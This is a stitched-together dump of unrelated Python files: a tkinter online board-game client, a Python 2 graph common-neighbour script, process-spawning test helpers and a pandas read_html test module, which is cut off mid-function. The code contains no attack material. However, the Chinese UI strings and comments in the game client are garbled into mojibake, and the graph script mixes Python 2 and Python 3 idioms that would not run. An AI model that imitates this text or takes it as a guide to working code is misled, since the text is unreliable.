if r.status_code != 200:
return {'code': -1, 'message': "Server Error."}
try:
js = json.loads(r.text)
except json.decoder.JSONDecodeError:
return {"code": code, "data": "", "error": "Server Error", "status": 0, "uptime": 0, "winner": 0}
return js
# UI้จๅ
class FaiUi:
def __init__(self, _root, code: str, player: int, is_new: bool = False, w: int = None, h: int = None):
self.code = code
self.myself = player
net = FAINetwork()
# ้่ฆๆฐๅปบๆฟ้ด
if is_new is True:
self.w, self.h = w, h
js = net.post_result(code, player, action='put', size='%sx%s' % (w, h))
js = net.get_result(code)
self.data = js['data']
else:
js = net.get_result(code)
self.data = js['data']
self.h = len(self.data.split('\n'))
self.w = len(self.data.split('\n')[0])
self.fai = FAI(self.w, self.h)
w = self.w
h = self.h
self.root = _root
self.root.resizable(width=False, height=False)
self.root.attributes('-alpha', 0.9)
self.root.title("FAI - ๅจ็บฟไบๅญๆฃๅฏนๆ็จๅบ (ๆฟ้ด %s)" % code)
self.started = False
self.stopped = False
self.time_p1, self.time_p2 = 0, 0
self.var_p1, self.var_p2 = StringVar(), StringVar()
self.message = StringVar()
self.player = 1
self.song = tkFont.Font(family='ๅฎไฝ', size=12, weight=tkFont.BOLD)
self.frame_p1 = Frame(self.root)
# self.button = Button(self.root, text='ๆฐๅผไธๅฑ', command=lambda: (self.root.destroy(), init_ui()))
self.message.set("ๆฐๅผไธๅฑ")
self.button = Button(self.root, textvariable=self.message, command=lambda: self.init_data(w, h), relief='groove')
self.frame_p2 = Frame(self.root)
Label(self.frame_p1, text="P1").grid(row=0, column=0)
Label(self.frame_p1, text="โ", font=self.song).grid(row=0, column=1)
Label(self.frame_p1, textvariable=self.var_p1).grid(row=1, columnspan=3)
Label(self.frame_p2, text="P2").grid(row=0, column=0)
Label(self.frame_p2, text="โ", font=self.song).grid(row=0, column=1)
Label(self.frame_p2, textvariable=self.var_p2).grid(row=1, columnspan=3)
self.frame = Frame(self.root)
self.map = [[None for i in range(w)] for i in range(h)]
self.click = [[None for i in range(w)] for i in range(h)]
self.vars = [[StringVar() for i in range(w)] for i in range(h)]
for y in range(h):
for x in range(w):
self.click[y][x] = FaiUiClick(self, fai=self.fai, w=w, h=h, x=x, y=y)
for y in range(self.h):
for x in range(self.w):
self.vars[y][x].set(self.fai.get_char(x=x, y=y))
self.refresh_time()
for y in range(h):
for x in range(w):
self.map[y][x] = Button(self.frame,
command=self.click[y][x].run,
# text=self.fai.CODE[self.fai.map[y][x]])
textvariable=self.vars[y][x],
font=self.song,
relief='groove',
bd=1)
self.map[y][x].grid(row=y, column=x)
self.frame_p1.grid(row=0, column=0)
# self.button.grid(row=0, column=1)
self.frame_p2.grid(row=0, column=2)
self.frame.grid(row=1, columnspan=3)
self.thread = None
self.thread_data = None
self.start()
def init_data(self, w: int, h: int):
self.w, self.h = w, h
self.time_p1, self.time_p2 = 0, 0
self.player = 1
self.started = False
self.stopped = False
self.message.set("ๆฐๅผไธๅฑ")
self.fai = FAI(w, h)
self.refresh_time()
for i in self.map:
for j in i:
j.grid_forget()
self.map = [[None for i in range(w)] for i in range(h)]
self.click = [[None for i in range(w)] for i in range(h)]
self.vars = [[StringVar() for i in range(w)] for i in range(h)]
for y in range(h):
for x in range(w):
self.click[y][x] = FaiUiClick(self, fai=self.fai, w=w, h=h, x=x, y=y)
for y in range(self.h):
for x in range(self.w):
self.vars[y][x].set(self.fai.get_char(x=x, y=y))
for y in range(h):
for x in range(w):
self.map[y][x] = Button(self.frame,
command=self.click[y][x].run,
# text=self.fai.CODE[self.fai.map[y][x]])
textvariable=self.vars[y][x],
font=self.song,
relief='groove',
bd=1)
self.map[y][x].grid(row=y, column=x)
if self.thread is not None:
self.started = False
self.thread.join()
self.thread = None
def update_time(self):
if self.player == 1:
self.time_p1 = self.time_p1 + 0.25
if self.player == 2:
self.time_p2 = self.time_p2 + 0.25
# ๅฆๆๆฏๆดๆฐๆๅทๆฐ
if self.time_p1 - int(self.time_p1) == 0 or self.time_p2 - int(self.time_p2) == 0:
self.refresh_time()
def refresh_time(self):
m, s = divmod(int(self.time_p1), 60)
self.var_p1.set("%02d:%02d" % (m, s))
m, s = divmod(int(self.time_p2), 60)
self.var_p2.set("%02d:%02d" % (m, s))
if self.player == 1:
self.var_p1.set(self.var_p1.get() + " ๆงๆฃ")
if self.player == 2:
self.var_p2.set(self.var_p2.get() + " ๆงๆฃ")
def update_loop(self):
while True:
time.sleep(0.25)
if self.started is False:
return
self.update_time()
def start(self):
self.started = True
# if self.thread is not None:
# self.thread.stop()
self.update_time()
self.thread = threading.Thread(target=self.update_loop)
# ๅฎๆค่ฟ็จ๏ผไธป็บฟ็จ็ปๆ่ชๅทฑไน็ปๆ
self.thread.setDaemon(True)
self.thread.start()
self.thread_data = threading.Thread(target=self.refresh_data)
# ๅฎๆค่ฟ็จ๏ผไธป็บฟ็จ็ปๆ่ชๅทฑไน็ปๆ
self.thread_data.setDaemon(True)
self.thread_data.start()
# ๅฎๆถๆดๆฐๆฃ็ๅ
ๅฎน
def refresh_data(self):
net = FAINetwork()
while True:
# data = net.get_data(self.code)
js = net.get_result(self.code)
if 'error' in js:
logger.error(js['error'])
return
data = js['data']
logger.info('Got json: %s' % json.dumps(js))
self.data = data
# logger.debug(data)
split = data.split('\n')
for y in range(len(split)):
for x in range(len(split[y])):
self.fai.map[y][x] = int(split[y][x])
self.vars[y][x].set(self.fai.get_char(x=x, y=y))
time.sleep(1)
if self.started is False:
return
def list2data(self, li: list):
data = ''
for y in li:
for x in y:
data = data + str(x)
data = data + '\n'
data = data[:-1]
return data
def data2list(self, data: str = None):
if data is None:
data = self.data
split = data.split('\n')
li = []
for y in split:
ix = []
for x in y:
ix.append(int(x))
li.append(ix)
return li
def refresh(self):
for y in range(self.h):
for x in range(self.w):
self.vars[y][x].set(self.fai.get_char(x=x, y=y))
m, s = divmod(self.time_p1, 60)
self.var_p1.set("%02d:%02d" % (m, s))
m, s = divmod(self.time_p2, 60)
self.var_p2.set("%02d:%02d" % (m, s))
if self.player == 1:
self.var_p1.set(self.var_p1.get() + " ๆงๆฃ")
if self.player == 2:
self.var_p2.set(self.var_p2.get() + " ๆงๆฃ")
# if __name__ == '__main__':
# fai = FAI(8, 8)
# # fai.put(0, 4, fai.P2)
# # fai.put(0, 5, fai.P1)
# # fai.put(0, 6, fai.P1)
# # fai.put(0, 7, fai.P1)
# # fai.put(0, 8, fai.P1)
# #
# # fai.put(1, 0, fai.P1)
# # fai.put(2, 0, fai.P2)
# # fai.put(3, 0, fai.P2)
# # fai.put(4, 0, fai.P2)
# # fai.put(5, 0, fai.P2)
#
# # fai.put(6, 1, fai.P1)
# # fai.put(5, 2, fai.P1)
# # fai.put(4, 3, fai.P1)
# # fai.put(3, 4, fai.P1)
# # fai.put(2, 5, fai.P1)
#
# # fai.put(2, 2, fai.P1)
# # fai.put(2, 3, fai.P1)
# # fai.put(2, 4, fai.P1)
# # fai.put(2, 5, fai.P1)
# # fai.put(2, 6, fai.P1)
#
# fai.put(0, 1, fai.P1)
#
# fai.play(fai.P1)
# print(fai)
# print("Player", fai.win(), 'is winner')
# ็นๅป็ๅฝๆฐไธ้จ่ฎพ็ฝฎไธไธช็ฑป๏ผๆตช่ดนๅ
ๅญ่กไธบ๏ผ
class FaiUiClick:
def __init__(self, _ui: FaiUi, fai, x=0, y=0, w=0, h=0):
self.ui = _ui
self.x, self.y = x, y
self.w, self.h = w, h
self.fai = fai
def set_pos(self, x, y):
self.x, self.y = x, y
def post_thread(self):
net = FAINetwork()
# ๆต่ฏๆพ็ฝฎ
fai = copy.deepcopy(self.fai)
res = fai.put(self.x, self.y, self.ui.player)
# self.fai.put(self.x, self.y, random.randint(0, 2))
# ๅฏไปฅๆพ็ฝฎ
if res:
li = self.ui.data2list()
li[self.y][self.x] = self.ui.player
data = self.ui.list2data(li)
self.ui.data = data
self.ui.fai.map = li
self.ui.refresh()
net.post_result(self.ui.code, self.ui.player, action='put', data=data)
# if self.ui.player == 1:
# self.ui.player = 2
# elif self.ui.player == 2:
# self.ui.player = 1
if self.ui.started is False:
self.ui.start()
self.ui.refresh()
win = self.fai.win()
if win != 0:
self.ui.message.set("P%d่ท่" % win)
self.ui.stopped = True
self.ui.started = False
def run(self):
if self.ui.stopped is True:
return
print('clicked:', 'x:', self.x, 'y:', self.y, 'player:', self.ui.player)
t = threading.Thread(target=self.post_thread)
t.start()
class FAIConfig:
def __init__(self, _root):
self.root = _root
self.root.title("FAI - ๅจ็บฟไบๅญๆฃๅฏนๆ็จๅบ")
self.root.resizable(width=False, height=False)
self.frame = Frame(self.root)
Label(self.frame, text="ๆฟ้ด").grid(row=0, column=0)
self.code = StringVar()
self.code.set("Master")
Entry(self.frame, textvariable=self.code).grid(row=0, column=1, sticky=W+E)
self.frame_wh = LabelFrame(self.frame, text='ๆฐๆฟ้ด')
self.w = StringVar()
self.h = StringVar()
self.entry_w = Entry(self.frame_wh, width=8, textvariable=self.w)
self.entry_h = Entry(self.frame_wh, width=8, textvariable=self.h)
# self.w.insert(0, "15")
# self.h.insert(0, "15")
self.w.set("15")
self.h.set("15")
self.entry_w.configure(state=DISABLED)
self.entry_h.configure(state=DISABLED)
Label(self.frame_wh, text="ๅฎฝๅบฆ").grid(row=2, column=0)
Label(self.frame_wh, text="้ซๅบฆ").grid(row=2, column=2)
self.entry_w.grid(row=2, column=1)
self.entry_h.grid(row=2, column=3)
self.frame_wh.grid(row=1, columnspan=3, sticky=W+E)
self.var_check = BooleanVar()
self.var_player = IntVar()
self.var_player.set(1)
Checkbutton(self.frame, text="ๅปบ็ซๆฐๆฟ้ด", variable=self.var_check,
command=self.check_fun)\
.grid(row=2, columnspan=3)
self.frame_player = LabelFrame(self.frame, text='็ฉๅฎถ')
Radiobutton(self.frame_player, value=1, variable=self.var_player, text='P1').grid(row=0, column=0)
Radiobutton(self.frame_player, value=2, variable=self.var_player, text='P2').grid(row=0, column=1)
Radiobutton(self.frame_player, value=0, variable=self.var_player, text='ๅด่ง').grid(row=0, column=2)
self.frame_player.grid(row=3, columnspan=3, sticky=W+E)
self.var_message = StringVar()
self.var_message.set('ๅผๅง')
Button(self.frame, textvariable=self.var_message, command=self.done)\
.grid(row=40, columnspan=2, sticky=W + E)
self.frame.grid()
self.ui = None
self.waiting = False
def check_fun(self):
if self.var_check.get() is True:
self.entry_w.configure(state=NORMAL)
self.entry_h.configure(state=NORMAL)
else:
self.entry_w.configure(state=DISABLED)
self.entry_h.configure(state=DISABLED)
def run_thread(self):
net = FAINetwork()
self.var_message.set('็ญๅพ
ๆๅกๅจๅๅบ...')
res = net.wakeup(timeout=30)
if res is False:
self.waiting = False
self.var_message.set("็ฝ็ป้่ฏฏ/ๆๅกๅจๅๅบ้่ฏฏ")
tkinter.messagebox.showerror("็ฝ็ป้่ฏฏ", "ๆๅกๅจๅๅบ้่ฏฏ")
return
self.var_message.set('ๆๅกๅจๅๅบ...OK')
try:
if self.var_check.get() is True:
self.ui = FaiUi(self.root, self.code.get(), self.var_player.get(),
is_new=True, w=int(self.w.get()), h=int(self.h.get()))
else:
self.ui = FaiUi(self.root, self.code.get(), self.var_player.get(),
is_new=False)
except ValueError as e:
self.waiting = False
self.var_message.set("ๅๆฐ่ฎพ็ฝฎ้่ฏฏ")
tkinter.messagebox.showerror("ๅๆฐ่ฎพ็ฝฎ้่ฏฏ", str(e))
return
self.frame.destroy()
# ไธ้่ฆmainloop
# self.ui.root.mainloop()
def done(self):
if self.waiting is True:
return
print('done', self.var_check.get(), self.var_player.get(), self.w.get(), self.h.get())
if self.code.get() == '':
tkinter.messagebox.showerror("ๆฟ้ด้่ฏฏ", "ๆฟ้ดๅไธบ็ฉบ")
return
self.waiting = True
t = threading.Thread(target=self.run_thread)
t.start()
logger = getLogger(__name__)
logger.info('Started')
if __name__ == '__main__':
# init_ui(12, 12)
# ui.root.mainloop()
config = FAIConfig(Tk())
config.root.mainloop()
|
common_neighbor_preprocess.py | import argparse
import networkx as nx
from multiprocessing import Process, Manager, cpu_count
import time
import os
def parse_args():
"Preprocessing for the commoneighbor"
parser = argparse.ArgumentParser(description='Preprocessing Commoneigbors')
parser.add_argument('--input', nargs='?', default='../graph/CA-AstroPh.txt',
help='Input graph path')
parser.add_argument('--output', nargs='?', default='../pre_data/CA-AstroPh_comneig.txt',
help='output the common neighbors')
parser.add_argument('--workers', type=int, default=10,
help='Number pf parallel workers, default = 10')
return parser.parse_args()
def read_graph():
'''
Reads the input network in networkx.
'''
G = nx.read_edgelist(args.input, nodetype=int, create_using=nx.Graph())
return G
def common_neighbors_score_parallel(G, nodes, num_workers=cpu_count()):
comneb_file = args.output
if os.path.exists(comneb_file):
os.remove(comneb_file)
with Manager() as manager:
comm_neighbor = manager.dict()
comm_nei_list = []
node_len = len(nodes)
for i in range(num_workers):
start = node_len * i // num_workers
end = node_len * (i + 1) // num_workers
ttt1 = time.time()
comm_nei = Process(target=common_neighbor_process, args=(G, nodes[start:end], comm_neighbor))
comm_nei.start()
ttt2 = time.time()
comm_nei_list.append(comm_nei)
for res in comm_nei_list:
res.join()
_comm_neighbor = comm_neighbor.copy()
f = open(comneb_file, 'a+')
for edge in _comm_neighbor:
f.write(u"{} {} {}\n".format(str(edge[0]), str(edge[1]), str(_comm_neighbor[edge])))
f.close()
return _comm_neighbor
def common_neighbor_process(G, nodes, comm_neighbor):
for cur in nodes:
for w in G[cur]:
v_nei = G[cur].keys()
v_nei.remove(w)
comm_neighbor[cur, w] = len(set(v_nei).intersection(set(G[w].keys())))
return comm_neighbor
def main(args):
print("load graph")
nx_G = read_graph()
print("Common neighbor preparing:")
time1 = time.time()
nodes = list(nx_G.nodes())
common_neighbors_score_parallel(nx_G, nodes, args.workers)
time2 = time.time()
print "Common neighbor time:", (time2-time1), 's'
if __name__ == "__main__":
args = parse_args()
main(args) |
helpers.py | import multiprocessing
import sys
import time
from typing import List, Optional
def sleep(sleepTime: float):
time.sleep(sleepTime)
def sleepWithExitCode(sleepTime: float, sysExitCode: int):
sleep(sleepTime)
if sysExitCode:
sys.exit(sysExitCode)
def sleepWithRetCode(sleepTime: float, returnCode: int):
sleep(sleepTime)
if returnCode:
return returnCode
def mpChild(sleepTime: float):
"""
This function is spawned by mpParent() and does nothing except wait.
"""
time.sleep(sleepTime)
def mpParent(childNum: int, sleepTime: float = 3):
"""
This function spawns other child processes mpChild() -
needed for PID and process control test functions.
"""
childs = []
# spawn child processes
for child in range(childNum):
proc = multiprocessing.Process(target=mpChild, args=(sleepTime, ))
childs.append(proc)
proc.start()
# wait for spawned processes to finish
for child in childs:
child.join()
time.sleep(1)
def getTestProcArgs(sleepTimeSec: Optional[float] = 10) -> List[str]:
""" Return command line string necessary to spawn this file as a subprocess
(and execute __main__).
Args:
sleepTimeSec: set the time spawned process should sleep.
Returns:
Command line arguments (list of strings) to spawn this file __main__.
"""
args = [sys.executable, __file__, str(sleepTimeSec)]
return args
if __name__ == "__main__":
if len(sys.argv) == 2:
sleepTime = float(sys.argv[1])
else:
sleepTime = 10
sleep(sleepTime)
sys.exit(0)
|
test_html.py | from functools import partial
from importlib import reload
from io import BytesIO, StringIO
import os
from pathlib import Path
import re
import threading
from urllib.error import URLError
import numpy as np
import pytest
from pandas.compat import is_platform_windows
from pandas.errors import ParserError
import pandas.util._test_decorators as td
from pandas import (
DataFrame,
MultiIndex,
Series,
Timestamp,
date_range,
read_csv,
to_datetime,
)
import pandas._testing as tm
from pandas.io.common import file_path_to_url
import pandas.io.html
from pandas.io.html import read_html
HERE = os.path.dirname(__file__)
@pytest.fixture(
params=[
"chinese_utf-16.html",
"chinese_utf-32.html",
"chinese_utf-8.html",
"letz_latin1.html",
]
)
def html_encoding_file(request, datapath):
"""Parametrized fixture for HTML encoding test filenames."""
return datapath("io", "data", "html_encoding", request.param)
def assert_framelist_equal(list1, list2, *args, **kwargs):
assert len(list1) == len(list2), (
"lists are not of equal size "
f"len(list1) == {len(list1)}, "
f"len(list2) == {len(list2)}"
)
msg = "not all list elements are DataFrames"
both_frames = all(
map(
lambda x, y: isinstance(x, DataFrame) and isinstance(y, DataFrame),
list1,
list2,
)
)
assert both_frames, msg
for frame_i, frame_j in zip(list1, list2):
tm.assert_frame_equal(frame_i, frame_j, *args, **kwargs)
assert not frame_i.empty, "frames are both empty"
@td.skip_if_no("bs4")
def test_bs4_version_fails(monkeypatch, datapath):
import bs4
monkeypatch.setattr(bs4, "__version__", "4.2")
with pytest.raises(ImportError, match="Pandas requires version"):
read_html(datapath("io", "data", "html", "spam.html"), flavor="bs4")
def test_invalid_flavor():
url = "google.com"
flavor = "invalid flavor"
msg = r"\{" + flavor + r"\} is not a valid set of flavors"
with pytest.raises(ValueError, match=msg):
read_html(url, match="google", flavor=flavor)
@td.skip_if_no("bs4")
@td.skip_if_no("lxml")
def test_same_ordering(datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs_lxml = read_html(filename, index_col=0, flavor=["lxml"])
dfs_bs4 = read_html(filename, index_col=0, flavor=["bs4"])
assert_framelist_equal(dfs_lxml, dfs_bs4)
@pytest.mark.parametrize(
"flavor",
[
pytest.param("bs4", marks=td.skip_if_no("bs4")),
pytest.param("lxml", marks=td.skip_if_no("lxml")),
],
scope="class",
)
class TestReadHtml:
@pytest.fixture(autouse=True)
def set_files(self, datapath):
self.spam_data = datapath("io", "data", "html", "spam.html")
self.spam_data_kwargs = {}
self.spam_data_kwargs["encoding"] = "UTF-8"
self.banklist_data = datapath("io", "data", "html", "banklist.html")
@pytest.fixture(autouse=True, scope="function")
def set_defaults(self, flavor, request):
self.read_html = partial(read_html, flavor=flavor)
yield
def test_to_html_compat(self):
df = (
tm.makeCustomDataframe(
4,
3,
data_gen_f=lambda *args: np.random.rand(),
c_idx_names=False,
r_idx_names=False,
)
.applymap("{:.3f}".format)
.astype(float)
)
out = df.to_html()
res = self.read_html(out, attrs={"class": "dataframe"}, index_col=0)[0]
tm.assert_frame_equal(res, df)
@pytest.mark.xfail(reason="Html file was removed")
@tm.network
def test_banklist_url_positional_match(self):
url = "https://www.fdic.gov/bank/individual/failed/banklist.html"
# Passing match argument as positional should cause a FutureWarning.
with tm.assert_produces_warning(FutureWarning):
df1 = self.read_html(
url, "First Federal Bank of Florida", attrs={"id": "table"}
)
with tm.assert_produces_warning(FutureWarning):
df2 = self.read_html(url, "Metcalf Bank", attrs={"id": "table"})
assert_framelist_equal(df1, df2)
@pytest.mark.xfail(reason="Html file was removed")
@tm.network
def test_banklist_url(self):
url = "https://www.fdic.gov/bank/individual/failed/banklist.html"
df1 = self.read_html(
url, match="First Federal Bank of Florida", attrs={"id": "table"}
)
df2 = self.read_html(url, match="Metcalf Bank", attrs={"id": "table"})
assert_framelist_equal(df1, df2)
@tm.network
def test_spam_url(self):
url = (
"https://raw.githubusercontent.com/pandas-dev/pandas/master/"
"pandas/tests/io/data/html/spam.html"
)
df1 = self.read_html(url, match=".*Water.*")
df2 = self.read_html(url, match="Unit")
assert_framelist_equal(df1, df2)
@pytest.mark.slow
def test_banklist(self):
df1 = self.read_html(
self.banklist_data, match=".*Florida.*", attrs={"id": "table"}
)
df2 = self.read_html(
self.banklist_data, match="Metcalf Bank", attrs={"id": "table"}
)
assert_framelist_equal(df1, df2)
def test_spam(self):
df1 = self.read_html(self.spam_data, match=".*Water.*")
df2 = self.read_html(self.spam_data, match="Unit")
assert_framelist_equal(df1, df2)
assert df1[0].iloc[0, 0] == "Proximates"
assert df1[0].columns[0] == "Nutrient"
def test_spam_no_match(self):
dfs = self.read_html(self.spam_data)
for df in dfs:
assert isinstance(df, DataFrame)
def test_banklist_no_match(self):
dfs = self.read_html(self.banklist_data, attrs={"id": "table"})
for df in dfs:
assert isinstance(df, DataFrame)
def test_spam_header(self):
df = self.read_html(self.spam_data, match=".*Water.*", header=2)[0]
assert df.columns[0] == "Proximates"
assert not df.empty
def test_skiprows_int(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_range(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=range(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=range(2))
assert_framelist_equal(df1, df2)
def test_skiprows_list(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=[1, 2])
df2 = self.read_html(self.spam_data, match="Unit", skiprows=[2, 1])
assert_framelist_equal(df1, df2)
def test_skiprows_set(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows={1, 2})
df2 = self.read_html(self.spam_data, match="Unit", skiprows={2, 1})
assert_framelist_equal(df1, df2)
def test_skiprows_slice(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_slice_short(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(2))
assert_framelist_equal(df1, df2)
def test_skiprows_slice_long(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2, 5))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(4, 1, -1))
assert_framelist_equal(df1, df2)
def test_skiprows_ndarray(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=np.arange(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=np.arange(2))
assert_framelist_equal(df1, df2)
def test_skiprows_invalid(self):
with pytest.raises(TypeError, match=("is not a valid type for skipping rows")):
self.read_html(self.spam_data, match=".*Water.*", skiprows="asdf")
def test_index(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_no_types(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", header=1, index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_with_types(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", header=1, index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_infer_types(self):
# 10892 infer_types removed
df1 = self.read_html(self.spam_data, match=".*Water.*", index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_string_io(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data1 = StringIO(f.read())
with open(self.spam_data, **self.spam_data_kwargs) as f:
data2 = StringIO(f.read())
df1 = self.read_html(data1, match=".*Water.*")
df2 = self.read_html(data2, match="Unit")
assert_framelist_equal(df1, df2)
def test_string(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data = f.read()
df1 = self.read_html(data, match=".*Water.*")
df2 = self.read_html(data, match="Unit")
assert_framelist_equal(df1, df2)
def test_file_like(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
df1 = self.read_html(f, match=".*Water.*")
with open(self.spam_data, **self.spam_data_kwargs) as f:
df2 = self.read_html(f, match="Unit")
assert_framelist_equal(df1, df2)
@tm.network
def test_bad_url_protocol(self):
with pytest.raises(URLError):
self.read_html("git://github.com", match=".*Water.*")
@tm.network
@pytest.mark.slow
def test_invalid_url(self):
try:
with pytest.raises(URLError):
self.read_html("http://www.a23950sdfa908sd.com", match=".*Water.*")
except ValueError as e:
assert "No tables found" in str(e)
@pytest.mark.slow
def test_file_url(self):
url = self.banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)), match="First", attrs={"id": "table"}
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
@pytest.mark.slow
def test_invalid_table_attrs(self):
url = self.banklist_data
with pytest.raises(ValueError, match="No tables found"):
self.read_html(
url, match="First Federal Bank of Florida", attrs={"id": "tasdfable"}
)
def _bank_data(self, *args, **kwargs):
return self.read_html(
self.banklist_data, match="Metcalf", attrs={"id": "table"}, *args, **kwargs
)
@pytest.mark.slow
def test_multiindex_header(self):
df = self._bank_data(header=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_index(self):
df = self._bank_data(index_col=[0, 1])[0]
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows_tuples(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index_skiprows(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1], skiprows=1)[0]
assert isinstance(df.index, MultiIndex)
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_regex_idempotency(self):
url = self.banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)),
match=re.compile(re.compile("Florida")),
attrs={"id": "table"},
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
def test_negative_skiprows(self):
msg = r"\(you passed a negative value\)"
with pytest.raises(ValueError, match=msg):
self.read_html(self.spam_data, match="Water", skiprows=-1)
@tm.network
def test_multiple_matches(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
assert len(dfs) > 1
@tm.network
def test_python_docs_table(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
zz = [df.iloc[0, 0][0:4] for df in dfs]
assert sorted(zz) == sorted(["Repo", "What"])
def test_empty_tables(self):
"""
Make sure that read_html ignores empty tables.
"""
html = """
<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
</table>
<table>
<tbody>
</tbody>
</table>
"""
result = self.read_html(html)
assert len(result) == 1
def test_multiple_tbody(self):
# GH-20690
# Read all tbody tags within a single table.
result = self.read_html(
"""<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
<tbody>
<tr>
<td>3</td>
<td>4</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data=[[1, 2], [3, 4]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_and_one_column(self):
"""
Don't fail with bs4 when there is a header and only one column
as described in issue #9178
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>first</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data={"Header": "first"}, index=[0])
tm.assert_frame_equal(result, expected)
def test_thead_without_tr(self):
"""
Ensure parser adds <tr> within <thead> on malformed HTML.
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Country</th>
<th>Municipality</th>
<th>Year</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ukraine</td>
<th>Odessa</th>
<td>1944</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(
data=[["Ukraine", "Odessa", 1944]],
columns=["Country", "Municipality", "Year"],
)
tm.assert_frame_equal(result, expected)
def test_tfoot_read(self):
"""
Make sure that read_html reads tfoot, containing td or th.
Ignores empty tfoot
"""
data_template = """<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>bodyA</td>
<td>bodyB</td>
</tr>
</tbody>
<tfoot>
{footer}
</tfoot>
</table>"""
expected1 = DataFrame(data=[["bodyA", "bodyB"]], columns=["A", "B"])
expected2 = DataFrame(
data=[["bodyA", "bodyB"], ["footA", "footB"]], columns=["A", "B"]
)
data1 = data_template.format(footer="")
data2 = data_template.format(footer="<tr><td>footA</td><th>footB</th></tr>")
result1 = self.read_html(data1)[0]
result2 = self.read_html(data2)[0]
tm.assert_frame_equal(result1, expected1)
tm.assert_frame_equal(result2, expected2)
def test_parse_header_of_non_string_column(self):
# GH5048: if header is specified explicitly, an int column should be
# parsed as int while its header is parsed as str
result = self.read_html(
"""
<table>
<tr>
<td>S</td>
<td>I</td>
</tr>
<tr>
<td>text</td>
<td>1944</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame([["text", 1944]], columns=("S", "I"))
tm.assert_frame_equal(result, expected)
@pytest.mark.slow
def test_banklist_header(self, datapath):
from pandas.io.html import _remove_whitespace
def try_remove_ws(x):
try:
return _remove_whitespace(x)
except AttributeError:
return x
df = self.read_html(self.banklist_data, match="Metcalf", attrs={"id": "table"})[
0
]
ground_truth = read_csv(
datapath("io", "data", "csv", "banklist.csv"),
converters={"Updated Date": Timestamp, "Closing Date": Timestamp},
)
assert df.shape == ground_truth.shape
old = [
"First Vietnamese American BankIn Vietnamese",
"Westernbank Puerto RicoEn Espanol",
"R-G Premier Bank of Puerto RicoEn Espanol",
"EurobankEn Espanol",
"Sanderson State BankEn Espanol",
"Washington Mutual Bank(Including its subsidiary Washington "
"Mutual Bank FSB)",
"Silver State BankEn Espanol",
"AmTrade International BankEn Espanol",
"Hamilton Bank, NAEn Espanol",
"The Citizens Savings BankPioneer Community Bank, Inc.",
]
new = [
"First Vietnamese American Bank",
"Westernbank Puerto Rico",
"R-G Premier Bank of Puerto Rico",
"Eurobank",
"Sanderson State Bank",
"Washington Mutual Bank",
"Silver State Bank",
"AmTrade International Bank",
"Hamilton Bank, NA",
"The Citizens Savings Bank",
]
dfnew = df.applymap(try_remove_ws).replace(old, new)
